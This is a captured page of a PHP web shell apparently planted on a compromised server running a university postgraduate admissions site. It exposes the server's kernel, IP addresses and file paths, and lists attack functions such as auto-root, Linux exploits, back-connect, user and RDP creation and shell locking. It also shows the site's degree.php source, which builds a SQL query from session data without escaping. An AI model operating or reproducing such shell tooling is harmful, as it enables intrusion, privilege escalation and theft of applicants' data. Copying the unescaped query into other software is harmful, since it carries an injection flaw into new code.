Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.118.144.239
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
gfgcg /
adm /
pgetadm /
[ HOME SHELL ]
Name
Size
Permission
Action
applicationFormPGReport.php
29.21
KB
-rwxr-xr-x
category.php
1.33
KB
-rwxr-xr-x
degree.php
2.34
KB
-rwxr-xr-x
dompdf.php
104.29
KB
-rwxr-xr-x
feestr.php
1.03
KB
-rwxr-xr-x
forgot-password.php
2.19
KB
-rwxr-xr-x
getSavedData.php
5
KB
-rwxr-xr-x
hallticket.php
7.47
KB
-rwxr-xr-x
login.php
326
B
-rwxr-xr-x
logout.php
44
B
-rwxr-xr-x
reprint.php
612
B
-rwxr-xr-x
resetpassword.php
700
B
-rwxr-xr-x
saveApplication.php
14.67
KB
-rwxr-xr-x
sendGridMail.php
1.28
KB
-rwxr-xr-x
sendMobEmailOTP.php
1.41
KB
-rwxr-xr-x
sendsmsapi.php
760
B
-rwxr-xr-x
signin.php
1015
B
-rwxr-xr-x
signup.php
1.01
KB
-rwxr-xr-x
studStatus.php
967
B
-rwxr-xr-x
validateRegno.php
1.52
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : degree.php
<?php function getFaculty($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); $query = "SELECT distinct FFACULTY AS int_code,concat('Faculty of ', FFACULTY) AS val FROM degree where ifnull(fadmdeg,'') = 'P' and fdeggrp = 'PG' and ifnull(ffaculty,'') <> '' and fexamno = 'A' order by FFACULTY asc"; $result1 = $aobj_context->mobj_db->GetAll($query); if(!$result1 && gettype($result1) == 'boolean'){ $arr['msg'] = "Error while fetching data"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"Failure"); return; } if(count($result1) > 0) { $arr['faculty'] = $result1; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,0,"success"); return; } else { $arr['msg'] = "No data found"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"Failure"); return; } } function getFacultyDegree($aobj_context) { $aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); // $ffaculty = $aobj_context->mobj_data["ffaculty"]; session_start(); $query = "select distinct d.fdegree as int_code, concat(d.fdescpn,' - ',d.fdegree) as val from degree d where d.fexamno = 'A' and ifnull(d.fadmdeg,'') = 'P' and ifnull(d.fdeleted,'') <> 'T' and fdeggrp = 'PG' order by ffaculty, d.fdescpn"; $result1 = $aobj_context->mobj_db->GetAll($query); $query = "select ifnull(fappno,'') as fappno, ifnull(ffinsub,'F') as ffinsub, ifnull(fpaystatus,'') as fpaystatus from pgstudadm where fmobileno = '{$_SESSION['MOBILE']}'"; $result2 = $aobj_context->mobj_db->GetRow($query); if(!$result1 && gettype($result1) == 'boolean'){ $arr['msg'] = "Error while fetching data"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"Failure"); return; } if(count($result1) > 0) { $arr['fappno'] = $result2['fappno']; $arr['fpaystatus'] = $result2['fpaystatus']; if(count($result2) == 0) $arr['fappno'] = ""; $arr['fmobileno'] = $_SESSION['MOBILE']; $arr['degree'] = $result1; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,0,"success"); return; } else { $arr['msg'] = "No data found"; echo $aobj_context->mobj_output->ToJSONEnvelope($arr,-1,"Failure"); return; } } ?>
Close